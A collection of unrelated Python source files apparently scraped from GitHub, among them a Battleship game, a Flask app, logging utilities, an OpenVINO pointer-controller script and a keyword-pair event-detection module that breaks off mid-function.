updateTime = models.DateTimeField('修改时间', auto_now=True)
uid = models.ForeignKey(to='login.UserTable', to_field='id', on_delete=models.CASCADE) # 用户Id
| lipenglo/AutoTestingPlatform-v3 | BackService/Api_TestReport/models.py | models.py | py | 6,395 | python | en | code | 4 | github-code | 90 |
19019451145 | from collections import deque
class Solution:
def __init__ (self):
self.table = {
'^': 1,
'*': 2,
'/': 2,
'+': 3,
'-': 3,
'(': 4
}
def InfixtoPostfix (self, string):
stk, res = deque(), []
for ch in string:
if (not ch.isalpha()):
if (ch == ')'):
while ((stk) and (stk[-1] != '(')): res.append(stk.pop())
stk.pop()
elif (ch == '('): stk.append('(')
else:
while ((stk) and (self.table[stk[-1]] <= self.table[ch])): res.append(stk.pop())
stk.append(ch)
else: res.append(ch)
while (stk): res.append(stk.pop())
return "".join(res)
| Tejas07PSK/lb_dsa_cracker | Stacks & Queues/Arithmetic Expression evaluation/solution1.py | solution1.py | py | 807 | python | en | code | 2 | github-code | 90 |
709694375 | def linearRegression(px,py):
sumx = 0
sumy = 0
sumxy = 0
sumxx = 0
n = len (px)
for i in range(n):
x = px[i]
y = py[i]
sumx += x
sumy += y
sumxx += x*x
sumxy += x*y
a=(sumxy-sumx*sumy/n)/(sumxx-(sumx**2)/n)
b=(sumy-a*sumx)/n
print(sumx,sumy,sumxy,sumxx)
return a,b
x=[0,1,2,3,4]
y=[4,6,8,10,12]
#print(x.__len__())
a,b=linearRegression(x,y)
print(a,b)
#y=ax+b
| Varanasi-Software-Junction/pythoncodecamp | ml/AIML.py | AIML.py | py | 453 | python | en | code | 10 | github-code | 90 |
39629867919 | from setuptools import find_packages, setup
NAME = "silicium-web"
VERSION = "0.1.2"
URL = "https://github.com/SamimiesGames/silicium"
AUTHOR = "Samimies"
DESCRIPTION = "Silicium-web is a massive cookiecutter template library for building UI on the web with Python."
setup(
name=NAME,
version=VERSION,
url=URL,
author=AUTHOR,
license="MIT",
description=DESCRIPTION,
packages=find_packages(exclude=["tests", "*.tests", "*.tests.*", "tests.*"], where="src"),
package_dir={"": "src"}
)
| SamimiesGames/silicium-web | setup.py | setup.py | py | 519 | python | en | code | 0 | github-code | 90 |
7150409724 | import numpy as np
from constants import coord, lenTablero
class Jugador:
tablero = []
tablero_impactos = []
tablero_barcos = [] # Tablero para comprobar si un barco está hundido (no se visualiza)
def __init__(self, is_maquina, nombre): # es_maquina (bool)-> indica si es maquina o no ; nombre-> nombre del jugador
self.is_maquina = is_maquina
self.nombre = nombre
def initTablero(self): # Función para inicializar tableros
self.tablero = np.full((lenTablero,lenTablero), " ")
self.tablero_impactos = np.full((lenTablero,lenTablero), " ")
self.tablero_barcos = np.full((10,10),0)
def colocarBarcos(self, tamBarco, num): # Función para colocar barcos en tableros
def checkColision(tamBarco, x,y, orientacion):
t = tamBarco
colision = False
c1 = x
c2 = y
while t:
if((self.tablero[c1+coord[orientacion][0]-1, c2+coord[orientacion][1]-1]!= " ") and #casilla libre
#TODO bug casilla libre Left Right Up Down D1 D2 D3 D4 a lo largo del nuevo barco
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]-2]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D1 U-D
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D2 U-I
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D3 D-I
# (((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]+2]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#D4 D-D
(((c1+coord[orientacion][0]-2 > -1) and (self.tablero[c1+coord[orientacion][0]-2, c2+coord[orientacion][1]-1]!= " ")) or ((c1+coord[orientacion][0]-1) == 0))and#Up
(((c1+coord[orientacion][0]+2 < lenTablero) and (self.tablero[c1+coord[orientacion][0]+2, c2+coord[orientacion][1]-1]!= " " ) or ((c1+coord[orientacion][1]-1) < lenTablero)))and#Down
(((c1+coord[orientacion][1]-2 > -1) and (self.tablero[c1+coord[orientacion][0], c2+coord[orientacion][1]-2]!= " ")) or (c1+coord[orientacion][1]-1) == 0)and#Left
(((c1+coord[orientacion][1] < lenTablero) and (self.tablero[c1+coord[orientacion][0], c2+coord[orientacion][1]]!= " ")) or (c1+coord[orientacion][1]) == lenTablero)):#Right
colision = True
break
else:
c1 += coord[orientacion][0]
c2 += coord[orientacion][1]
if colision:
break
else:
t-=1
return colision
tam = tamBarco # Posicion inicial
while(num):
aOrientacion = ["N","S","E","O"]
num -=1
initPosition = False
while not initPosition:
x = np.random.randint(lenTablero)
y = np.random.randint(lenTablero)
if ((self.tablero[x,y] == " ") and
((((x+1 < lenTablero) and (self.tablero[x+1,y] == " ")) or (x+1 == lenTablero))) and
(((x-1 > -1) and (self.tablero[x-1,y] == " ") or (x == 0))) and
(((y+1 < lenTablero) and (self.tablero[x,y+1] == " ")) or (y + 1 == lenTablero))):# and
#(((y+1 < lenTablero) and (x+1 < lenTablero) and (self.tablero[x+1,y+1] == " ")) or (y+1 == lenTablero)) and#diagonal
#(((y-1 > -1) and (x+1 < lenTablero) and (self.tablero[x+1,y-1] == " "))or (y == 0)) and
#(((y-1 > -1) and (y-1 > -1) and (self.tablero[x-1,y-1] == " ")) or (y == 0)) and
#(((y+1 < lenTablero)and (x-1 > -1) and (self.tablero[x-1,y+1] == " ")))or (y+1 == lenTablero)):
self.tablero[x,y] = str(tam) + str(num)
initPosition = True
orientacion = aOrientacion[np.random.randint(len(aOrientacion))] # Elegir orientacion posible
imposible = True
colision = False
while imposible:
if (((x - tam > 0) and orientacion == "N") or
(((tam + x ) < lenTablero) and orientacion == "S") or
(((lenTablero - y ) >= tam) and orientacion == "E") or
(((y - tam) >= 0) and orientacion == "O")
):
#alguna coordenada es inicialmente valida
colision = checkColision(tam, x,y, orientacion)
if not colision:
imposible = False
if imposible and colision:
aOrientacion = ["N","S","E","O"]
#new init position
#borrar coordenada valida
initPosition = False
orientacion = aOrientacion[np.random.randint(len(aOrientacion))]
elif imposible:
orientacion = aOrientacion[np.random.randint(len(aOrientacion))]
#colocar barco
while tamBarco:
t = tamBarco -1
self.tablero[x+(coord[orientacion][0]*t), y+(t*coord[orientacion][1])] = tam
self.tablero_barcos[x+(coord[orientacion][0]*t), y+(t*coord[orientacion][1])] = str(tam) + str(num)
tamBarco-=1
tamBarco = tam
def getIndiceLetra(self,letra:str): # Función de utilidad para obtener el índice de una letra
return ord(letra.replace(" ", "").upper()) - 65
def incrementar_letra(letra): # función de utilidad para incremento progresivo
return chr(ord(letra)+1)
def mostrarTableros(self): # Función que muestra ambos tableros de juego
print("\n", f" Tablero de barcos: Tablero de impactos:", "\n")
self.imprimir_tablero(self.tablero, self.tablero_impactos, True)
def imprimir_fila_de_numeros(self): # Funcion que crea dos filas de numeros consecutivas de los tableros del jugador
fila_de_numeros_doble = "| "
for x in range(10):
if x == 9:
fila_de_numeros_doble += f"| {x+1}"
else:
fila_de_numeros_doble += f"| {x+1} "
fila_de_numeros_doble += "| | "
for x in range(10):
if x == 9:
fila_de_numeros_doble += f"| {x+1}"
else:
fila_de_numeros_doble += f"| {x+1} "
fila_de_numeros_doble += "|"
print(fila_de_numeros_doble)
def imprimir_separador_horizontal(self): # Funcion que crea los separadores horizontales de los tableros del jugador
separador_doble = ""
for _ in range(11):
separador_doble += "+---"
separador_doble += "+ "
for _ in range(11):
separador_doble += "+---"
separador_doble += "+"
print(separador_doble)
# IMPRESION TABLEROS SIDE BY SIDE (cacharreo con codigo de aida)
# matriz_barcos: Numpy.ndarray con digitos que representa los barcos
# matriz_impactos: Numpy.Array que representa los impactos en el contrario
# deberia_mostrar_barcos: Booleano que representa si se deberían imprimirse barcos
def imprimir_tablero(self, matriz_barcos, matriz_impactos, deberia_mostrar_barcos): # Función que imprime dos tableros side by side
for y, letra in enumerate(["A","B","C","D","E","F","G","H","I","J"]):
self.imprimir_separador_horizontal()
m_barcos_string: str = f"| {letra} "
m_impactos_string: str = f"| {letra} "
for x in range(10):
celda_barco = matriz_barcos[y][x]
celda_impactos = matriz_impactos[y][x]
if not deberia_mostrar_barcos and celda_barco != " " and celda_barco != "-" and celda_barco != "X":
celda_barco = " "
if celda_barco.isdigit():
celda_barco = "O"
if not (not deberia_mostrar_barcos) and celda_impactos != " " and celda_impactos != "-" and celda_impactos != "X":
celda_impactos = " "
m_barcos_string += f"| {celda_barco} "
m_impactos_string += f"| {celda_impactos} "
m_barcos_string += "|"
m_impactos_string += "|"
print( m_barcos_string + " " + m_impactos_string )
self.imprimir_separador_horizontal()
self.imprimir_fila_de_numeros()
self.imprimir_separador_horizontal()
def getDisparo(self, x, y): # Función que comprueba las coordenadas insertadas por el usuario y actualiza el tablero de impactos
res = ""
if isinstance(x,str):
if(x.isdigit()):
x = int(x)
else:
x = self.getIndiceLetra(x) # En teoría los valores x e y ya están filtrados
y = int(y)
if self.tablero[x,y] == "O" or self.tablero[x,y].isdigit():
if self.todosHundidos():
res = "fin de juego"
elif self.barcoHundido(x,y):
res = "XX"
elif self.barcoTocado(x,y):
res = "X"
else:
res = "-"
self.tablero[x,y] = res # Devuelve esta variable para ir cambiando de turno en la clase Game
return res
def setDisparo(self, x, y, res): # Función que actualiza las coordenadas en el tablero_impacto
self.tablero_impactos[x,y] = res
def barcoHundido(self, x, y): # Expresión booleana para identificar un barco tocado y hundido - crear diccionario / clase barcos
if (len(self.tablero_barcos[self.tablero_barcos == self.tablero_barcos[x,y]]) <= 1):
print(f" * Barco de {self.tablero[x,y]} posiciones hundido *")
self.tablero_barcos[x,y] = 0
return len(self.tablero_barcos[self.tablero_barcos == self.tablero_barcos[x,y]]) <= 1
def barcoTocado(self, x, y): # Expresión booleana para que identificar un barco tocado
return self.tablero[x,y] == "O" or self.tablero[x,y].isdigit()
def todosHundidos(self): # Expresión booleana para que identificar que todos los barcos han sido hundido s
return len(np.where( self.tablero == "O")) == 0
| marinagoju/Battleship | src/utilsJugador.py | utilsJugador.py | py | 11,180 | python | es | code | 0 | github-code | 90 |
29919618899 | import unittest
from unittest import TestCase
from crawler.core.downloader import Downloader
class TestDownloader(TestCase):
def test_downloader_page(self):
url = "https://baike.baidu.com/item/Python/407313"
content = Downloader.downloader_page(url)
self.assertIsNotNone(content)
if __name__ == '__main__':
unittest.main()
| EasonAndLily/SimpleCrawler | crawler/test/test_downloader.py | test_downloader.py | py | 361 | python | en | code | 1 | github-code | 90 |
72290728618 | """
Specify custom location for the tree plot file
"""
from cmdstanpy import CmdStanModel
from tarpan.cmdstanpy.tree_plot import save_tree_plot
from tarpan.shared.info_path import InfoPath
def run_model():
model = CmdStanModel(stan_file="eight_schools.stan")
data = {
"J": 8,
"y": [28, 8, -3, 7, -1, 1, 18, 12],
"sigma": [15, 10, 16, 11, 9, 11, 10, 18]
}
fit = model.sample(data=data, chains=4, cores=4, seed=1,
sampling_iters=1000, warmup_iters=1000)
# Change all path components:
# ~/tarpan/analysis/model1/normal.png
save_tree_plot([fit],
info_path=InfoPath(
path='~/tarpan',
dir_name="analysis",
sub_dir_name="model1",
base_name="normal",
extension="png"
))
# Change the file name:
# model_into/custom_location/my_summary.pdf
save_tree_plot([fit],
info_path=InfoPath(base_name="my_summary"))
# Change the file type:
# model_into/custom_location/summary.png
save_tree_plot([fit],
info_path=InfoPath(extension="png"))
# Change the sub-directory name:
# model_into/custom/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(sub_dir_name="custom"))
# Do not create sub-directory:
# model_into/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(sub_dir_name=InfoPath.DO_NOT_CREATE))
# Change the default top directory name from `model_info`:
# my_files/custom_location/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(dir_name='my_files'))
# Change the root path to "tarpan" in your user's home directory
# ~/tarpan/model_info/custom_location/summary.pdf
save_tree_plot([fit],
info_path=InfoPath(path='~/tarpan'))
if __name__ == '__main__':
run_model()
print('We are done')
| evgenyneu/tarpan | docs/examples/save_tree_plot/a03_custom_location/custom_location.py | custom_location.py | py | 2,039 | python | en | code | 2 | github-code | 90 |
23623805703 | from flask import Flask, render_template
import user_story
app = Flask(__name__)
@app.route('/')
def index():
user_stories = user_story.get_user_stories()
headers = user_story.get_headers()
return render_template("index.html", stories=user_stories, headers=headers)
if __name__ == '__main__':
app.run() | UltraViolet5/new-flusk-demo | app.py | app.py | py | 324 | python | en | code | 0 | github-code | 90 |
7351134991 | import pandas as pd
def main():
df = pd.read_csv('data.csv')
df = df.sort_values(by=['score'], ascending=False)
df = df.reset_index(drop=True)
df.to_csv('sort.csv', index=False)
if __name__ == '__main__':
main() | LaurenceYang1218/13csnight | sort.py | sort.py | py | 246 | python | en | code | 2 | github-code | 90 |
22662995 | #!/usr/bin/env python3
#############################################################################################################
#
# Computer Pointer Controller Main Script
#
#############################################################################################################
'''
Computer Pointer Controller:
This is the main script for the running all the code and the functions. The computer pointer takes the input parameter.
Input Arguments:
1. Model-01 -> Face Detection Model
2. Model-02 -> Head Pose Estimation Model
3. Model-03 -> Landmark Detection Model
4. Model-04 -> Gaze Estimator Model
5. Input (Video or Webcam) -> media file in .mp4 or CAM
6. Device -> 'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'
7. Flags -> Show if enabled option for models
8. Resolution -> Width and Height (Optional)
Output Arguments:
1. Media -> Output on screen and save file
2. timelapse -> video time inference in fps with seconds
3. Samples -> Output of the model outcome as per the Flags initiated
4. perf_stats -> Statics of the inference backend
'''
# load the library
# load the system libary
import os.path as osp
import sys
import time
# load numerical operation library
import numpy as np
from math import cos, sin, pi
# load the log librarys
import logging as log
# load OpenCV library
import cv2
# load the Argument Parser for user input
from argparse import ArgumentParser
# load the model and input feeder library (custom)
from utils.ie_module import Inference_Context
from utils.helper import cut_rois, resize_input
from src.face_detection import Face_Detection
from src.head_position_estimation import Head_Pose_Estimator
from src.landmark_detection import Landmarks_Detection
from src.gaze_Estimator import Gaze_Estimation
from src.mouse_controller import Mouse_Controller_Pointer
from src.mouse_process import Mouse_Controller
# load the OpenVINO library
from openvino.inference_engine import IENetwork
# Set the Device operation types
DEVICE_KINDS = ['CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL']
def build_argparser():
"""
Parse command line arguments.
-i bin/demo.mp4
-m_fd <path>models/intel/face-detection-adas-binary-0001/FP32-INT1/face-detection-adas-binary-0001.xml
-d_fd { 'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_fd
-m_hp <path>models/intel/head-pose-estimation-adas-0001/FP16/head-pose-estimation-adas-0001.xml
-d_hp {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_hp
-m_lm <path>mo_model/intel/landmarks-regression-retail-0009/FP16/landmarks-regression-retail-0009.xml
-d_lm {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_lm
-m_gm <path>mo_model/intel/gaze-estimation-adas-0002/FP16/gaze-estimation-adas-0002.xml
-d_gm {'CPU', 'GPU', 'FPGA', 'MYRIAD', 'HETERO', 'HDDL'}
-o_gm
-o <path>results/outcome<num>
-pc
:return: command line arguments
"""
parser = ArgumentParser()
parser.add_argument("-i", "--input", required=True, type=str,
help="Path to image or video file in .mp4 format or enter CAM for webcam")
parser.add_argument("-m_fd", "--model_face_detection", required=True, type=str,
help="Path to load an .xml file with a trained Face Detection model")
parser.add_argument('-d_fd', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Face Detection model device selection (default: %(default)s)")
parser.add_argument('-t_fd', metavar='[0..1]', type=float, default=0.4,
help="(optional) Set the Probability threshold for face detections" \
"(default: %(default)s)")
parser.add_argument('-o_fd', action='store_true',
help="(optional) Process the face detection output")
parser.add_argument("-m_hp", "--model_head_position", required=True, type=str,
help="Path to load an .xml file with a trained Head Pose Estimation model")
parser.add_argument('-d_hp', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Head Position model (default: %(default)s)")
parser.add_argument('-o_hp', action='store_true',
help="(optional) Show Head Position output")
parser.add_argument("-m_lm", "--model_landmark_regressor", required=True, type=str,
help="Path to load an .xml file with a trained Head Pose Estimation model")
parser.add_argument('-d_lm', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Facial Landmarks Regression model (default: %(default)s)")
parser.add_argument('-o_lm', action='store_true',
help="(optional) Show Landmark detection output")
parser.add_argument("-m_gm", "--model_gaze", required=True, type=str,
help="Path to an .xml file with a trained Gaze Estimation model")
parser.add_argument('-d_gm', default='CPU', choices=DEVICE_KINDS,
help="(optional) Target device for the " \
"Gaze estimation model (default: %(default)s)")
parser.add_argument('-o_gm', action='store_true',
help="(optional) Show Gaze estimation output")
parser.add_argument('-o_mc', action='store_true',
help="(optional) Run mouse counter")
parser.add_argument('-pc', '--perf_stats', action='store_true',
help="(optional) Output detailed per-layer performance stats")
parser.add_argument('-exp_r_fd', metavar='NUMBER', type=float, default=1.20,
help="(optional) Scaling ratio for bboxes passed to face recognition " \
"(default: %(default)s)")
parser.add_argument('-cw', '--crop_width', default=0, type=int,
help="(optional) Crop the input stream to this width " \
"(default: no crop). Both -cw and -ch parameters " \
"should be specified to use crop.")
parser.add_argument('-ch', '--crop_height', default=0, type=int,
help="(optional) Crop the input stream to this width " \
"(default: no crop). Both -cw and -ch parameters " \
"should be specified to use crop.")
parser.add_argument('-v', '--verbose', action='store_true',
help="(optional) Be more verbose")
parser.add_argument('-l', '--cpu_lib', metavar="PATH", default="",
help="(optional) For MKLDNN (CPU)-targeted custom layers, if any. " \
"Path to a shared library with custom layers implementations")
parser.add_argument('-c', '--gpu_lib', metavar="PATH", default="",
help="(optional) For clDNN (GPU)-targeted custom layers, if any. " \
"Path to the XML file with descriptions of the kernels")
parser.add_argument('-tl', '--timelapse', action='store_true',
help="(optional) Auto-pause after each frame")
parser.add_argument('-o', '--output', metavar="PATH", default="",
help="(optional) Path to save the output video to directory")
return (parser)
##########################################################################################################
def main():
args = build_argparser().parse_args()
log.basicConfig(format="[ %(levelname)s ] %(asctime)-15s %(message)s",
level=log.INFO if not args.verbose else log.DEBUG, stream=sys.stdout)
driverMonitoring = Mouse_Controller(args)
driverMonitoring.run(args)
if __name__ == "__main__":
main() | Nitin-Mane/Computer-Pointer-Controller | main.py | main.py | py | 8,101 | python | en | code | 0 | github-code | 90 |
33409339837 | import os
import logging
from logging import Logger, Formatter, Handler, FileHandler, StreamHandler
from tqdm import tqdm
from typing import Iterable, Optional, List, Dict, Union
import torch.distributed as dist
from .distributed import is_master
def get_logger(name: Optional[str] = None) -> Logger:
logger = logging.getLogger(name)
if name is None:
logging.basicConfig(
format="[%(asctime)s %(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
handlers=[TqdmHandler()]
)
return logger
def init_logger(logger: Logger,
log_file: Optional[str] = None,
level: int = logging.INFO,
non_master_level: int = logging.ERROR,
mode: str = 'w',
handlers: Optional[Iterable[Handler]] = None,
verbose: bool = True) -> Logger:
if not handlers:
if log_file:
os.makedirs(os.path.dirname(log_file) or './', exist_ok=True)
logger.addHandler(FileHandler(log_file, mode))
for handler in logger.handlers:
handler.setFormatter(ColoredFormatter(colored=not isinstance(handler, FileHandler)))
if verbose:
logger.setLevel(level if is_master() else non_master_level)
return logger
def print_log(msg: str, logger: Optional[Logger] = None, level: int = logging.INFO) -> None:
if logger is None:
print(msg)
elif isinstance(logger, Logger):
logger.log(level, msg)
elif logger == "silent":
pass
else:
raise TypeError(f"Logger should be either a logging.Logger object, 'silent' or None, "
f"but got {type(logger)}.")
def log_line(logger: Optional[Logger] = None, lens: int = 81, level: int = logging.INFO) -> None:
msg = '-' * lens
print_log(msg=msg, logger=logger, level=level)
def log_message(msg: str, logger: Optional[Logger] = None, level: int = logging.INFO) -> None:
lines = msg.split('\n')
for line in lines:
if line.strip():
print_log(msg=line, logger=logger, level=level)
def log_table(table: Union[Dict, List[Dict]],
columns: Optional[List] = None,
logger: Optional[Logger] = None,
level: int = logging.INFO) -> None:
# parse table head
if isinstance(table, Dict):
table = [table]
if not columns:
columns = list(table[0].keys() if table else [])
p_list = [columns] # 1st row = header
# parse table line
for item in table:
p_list.append([str(item[col] or '') for col in columns])
# format table
# maximun size of the col for each element
col_size = [max(map(len, col)) for col in zip(*p_list)]
# insert seperating line before every line, and extra one for ending
for i in range(0, len(p_list) + 1)[::-1]:
p_list.insert(i, ['-' * i for i in col_size])
# two format for each content line and each seperating line
format_edg = "---".join(["{{:<{}}}".format(i) for i in col_size])
format_str = " | ".join(["{{:<{}}}".format(i) for i in col_size])
format_sep = "-+-".join(["{{:<{}}}".format(i) for i in col_size])
# print table
print_log(format_edg.format(*p_list[0]), logger, level=level)
for item in p_list[1:-1]:
if item[0][0] == '-':
print_log(format_sep.format(*item), logger, level=level)
else:
print_log(format_str.format(*item), logger, level=level)
print_log(format_edg.format(*p_list[-1]), logger, level=level)
def progress_bar(logger: Logger,
iterator: Iterable = None,
total: int = None,
ncols: Optional[int] = None,
bar_format: Optional[str] =
"{l_bar}{bar:20}| {n_fmt}/{total_fmt} {elapsed}<{remaining}, {rate_fmt}{postfix}",
leave: bool = False,
**kwargs) -> tqdm:
return tqdm(
iterator,
total=total,
ncols=ncols,
bar_format=bar_format,
ascii=False,
disable=(not (logger.level == logging.INFO and is_main_process())),
leave=leave,
**kwargs
)
class TqdmHandler(StreamHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def emit(self, record):
try:
msg = self.format(record)
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.handleError(record)
class ColoredFormatter(Formatter):
BLACK = "\033[30m"
RED = "\033[31m"
YELLOW = "\033[33m"
GREEN = "\033[32m"
GREY = "\033[37m"
RESET = "\033[0m"
COLORS = {
logging.ERROR: RED,
logging.WARNING: YELLOW,
logging.INFO: GREEN,
logging.DEBUG: GREY,
logging.NOTSET: BLACK
}
def __init__(self, colored=True, *args, **kwargs):
super().__init__(*args, **kwargs)
self.colored = colored
def format(self, record):
fmt = "[%(asctime)s %(levelname)s] %(message)s"
if self.colored:
fmt = f"{self.COLORS[record.levelno]}[%(asctime)s %(levelname)s]" \
f"{self.RESET} %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
return Formatter(fmt=fmt, datefmt=datefmt).format(record)
def is_main_process():
if not dist.is_available() or not dist.is_initialized():
return True
else:
return dist.get_rank() == 0
logger = get_logger()
| ningyuxu/calf | calf/utils/log.py | log.py | py | 5,539 | python | en | code | 0 | github-code | 90 |
17922200066 | #!/usr/bin/env python
import os
from trackutil.pathutil import get_timestamps_in_dir,\
get_datafiles_in_dir, mkdir
from trackutil.pathutil import get_ts_int_in_dir
from trackutil.pathutil import get_storyline_module_dir
from trackutil.pathutil import get_storyline_root
from trackutil.confutil import get_config
from trackutil.ioutil import jsonload, jsondump
from trackutil.logger import INFO
from trackutil.alg import ig
def main():
    """Run high-IG keyword-pair detection over every bucketized timestamp.

    Reads directory layout and the IG threshold from the global config,
    then processes each timestamp window in chronological order, feeding
    the previous window's top keyword pairs into the current detection.
    """
    cfg = get_config()
    root = cfg['data']['outdir']
    root = os.path.join(root, cfg['storyline']['datadir'])
    inputdir = os.path.join(root, cfg['storyline']['bucketize']['datadir'])
    outputdir = os.path.join(root, cfg['storyline']['detect']['datadir'])
    metadir = os.path.join(root, cfg['storyline']['detect']['metadatadir'])
    thresh = cfg['storyline']['detect']['ig_thresh']

    tslist = get_timestamps_in_dir(inputdir)
    total = len(tslist)
    # Sentinel -1 means "no previous window" for the very first timestamp.
    pre_ts = -1
    for done, ts in enumerate(tslist, start=1):
        pre_top_kwp_list = get_pre_top_ig_kwp(metadir, pre_ts)
        get_top_ig_buckets(
            inputdir, outputdir, ts, thresh, pre_top_kwp_list, metadir)
        pre_ts = ts
        INFO('processed {}/{}'.format(done, total))
def eventdetect(ts, cfg=None):
    """Run high-IG keyword-pair detection for a single timestamp ``ts``.

    Loads the configuration (unless one is passed in), locates ``ts``
    within the bucketize output, determines the previous window's
    timestamp (or -1 for the first window), and delegates to
    get_top_ig_buckets.
    """
    INFO('[High IG Keyword Pair Detect] {}'.format(ts))
    if cfg is None:
        cfg = get_config()
    root = get_storyline_root(cfg)
    inputdir = get_storyline_module_dir(cfg, 'bucketize')
    outputdir = get_storyline_module_dir(cfg, 'detect')
    metadir = os.path.join(root, cfg['storyline']['detect']['metadatadir'])
    thresh = cfg['storyline']['detect']['ig_thresh']
    mkdir(outputdir)
    tslist = get_ts_int_in_dir(inputdir)
    cur_idx = tslist.index(ts)
    # First window has no predecessor.
    if cur_idx == 0:
        pre_ts = -1
    else:
        pre_ts = tslist[cur_idx - 1]
    pre_top_kwp_list = get_pre_top_ig_kwp(metadir, pre_ts)
    get_top_ig_buckets(
        inputdir, outputdir, ts, thresh, pre_top_kwp_list, metadir)
def get_pre_top_ig_kwp(datadir, pre_ts):
    '''
    Get the top IG keyword pairs of the (previous) timestamp.

    Returns an empty list when there is no previous window (pre_ts < 0)
    or when the metadata file for pre_ts cannot be loaded.
    '''
    if pre_ts < 0:
        return []
    mkdir(datadir)
    fn = '{}.json'.format(pre_ts)
    kwp_list = jsonload(os.path.join(datadir, fn))
    if kwp_list is None:
        kwp_list = []
    return kwp_list
def get_top_ig_buckets(input_dir, outputdir, ts, thresh, pre_top_kwp_list,
                       metadir):
    '''
    Detect the top Information Gain (IG) keyword pairs for the window
    ending at `ts` and dump them (with their tweets) to `outputdir`.

    input_dir        -- directory holding the bucketized keyword-pair data
    outputdir        -- directory to write the detected buckets to
    ts               -- timestamp identifying the current window
    thresh           -- minimum IG for a new keyword pair to be kept
    pre_top_kwp_list -- keyword pairs that were top-IG in the previous
                        window; they are inherited as long as they retain
                        more than half of their previous volume
    metadir          -- directory where the kept keyword-pair list is
                        dumped so the next window can inherit it

    Returns early (writing nothing) when there is not enough history to
    form two consecutive windows.
    '''
    mkdir(outputdir)
    cur_buckets, pre_buckets = get_combined_buckets(input_dir, ts)
    if cur_buckets is None:
        return
    cur_total = get_tweet_num(cur_buckets)
    pre_total = get_tweet_num(pre_buckets)
    cur_buckets = remove_unpopular_kwpair(cur_buckets)
    result = {}
    pre_top_kwp_list = set(pre_top_kwp_list)
    stat_inherited_num = 0
    stat_skipped_pre_num = 0
    for kwp in cur_buckets:
        # Process the high-IG keyword pairs inherited from the previous
        # window: keep them while they retain > half their prior volume.
        if kwp in pre_top_kwp_list:
            if kwp not in pre_buckets:
                pre_len = 0
            else:
                pre_len = len(pre_buckets[kwp])
            cur_len = len(cur_buckets[kwp])
            if cur_len > pre_len / 2.0:
                result[kwp] = {}
                result[kwp]['tweets'] = cur_buckets[kwp]
                # Sentinel IG marking an inherited (not recomputed) pair.
                result[kwp]['ig'] = -1000.0
                result[kwp]['igparam'] = []
                stat_inherited_num += 1
            else:
                # INFO('Found a kwp {} that we stop tracking'.format(kwp))
                stat_skipped_pre_num += 1
            # BUGFIX: always move on to the next kwp here. Previously only
            # the "stop tracking" branch continued, so an inherited pair
            # that was KEPT fell through to the assertion below and raised
            # AssertionError on the first kept inherited keyword pair.
            continue
        assert kwp not in pre_top_kwp_list
        # Process the non-inherited keyword pairs with the IG test.
        # A/B = pair volume in the previous/current window;
        # C/D = remaining tweets in the previous/current window.
        B = len(cur_buckets[kwp])
        D = cur_total - B
        if kwp not in pre_buckets:
            A = 0
        else:
            A = len(pre_buckets[kwp])
        C = pre_total - A
        if B < A:
            # seems the keyword pair is losing popularity
            continue
        IG = ig(A, B, C, D)
        if IG >= thresh:
            result[kwp] = {}
            result[kwp]['tweets'] = cur_buckets[kwp]
            result[kwp]['ig'] = IG
            result[kwp]['igparam'] = [A, B, C, D]
    INFO('Inherited {} kwp, skipped {} kwp from pre window'.format(
        stat_inherited_num, stat_skipped_pre_num))
    fn = '{}.json'.format(ts)
    jsondump(result, os.path.join(outputdir, fn))
    # Dump the kept high-IG kwp list for the next window to inherit.
    # NOTE(review): result.keys() is a view on Python 3; wrap in list() if
    # jsondump serializes with the stdlib json module there — confirm.
    jsondump(result.keys(), os.path.join(metadir, fn))
def get_tweet_num(buckets):
    '''Count the distinct tweet ids across all buckets.

    Each bucket value is a list of records whose first element is the
    tweet id; a tweet appearing in several buckets is counted once.
    '''
    unique_ids = {record[0]
                  for records in buckets.values()
                  for record in records}
    return len(unique_ids)
def remove_unpopular_kwpair(buckets):
    '''
    Remove the unpopular kw pairs in the current window.

    A pair is kept only when its bucket has at least
    cfg['storyline']['detect']['kw_pop_thresh'] entries. Returns a new
    dict; the input is not mutated.
    '''
    cfg = get_config()
    popthresh = cfg['storyline']['detect']['kw_pop_thresh']
    buckets_cleaned = {}
    for key in buckets:
        if len(buckets[key]) < popthresh:
            continue
        buckets_cleaned[key] = buckets[key]
    return buckets_cleaned
def get_combined_buckets(input_dir, ts):
    '''
    Get the buckets in the window ending with the ts and those in the
    previous window as well. Return None, None if we do not have enough
    history (fewer than two full windows of timestamps before ts).
    '''
    ts = str(ts)
    tslist = get_timestamps_in_dir(input_dir)
    idx = tslist.index(ts)
    cfg = get_config()
    windowlen = cfg['storyline']['windowlen']
    # Need two back-to-back windows: [idx-2w+1 .. idx-w] and [idx-w+1 .. idx].
    if idx + 1 < 2 * windowlen:
        INFO('Do not have enough history')
        return None, None
    cur_buckets = get_window_buckets(input_dir, ts)
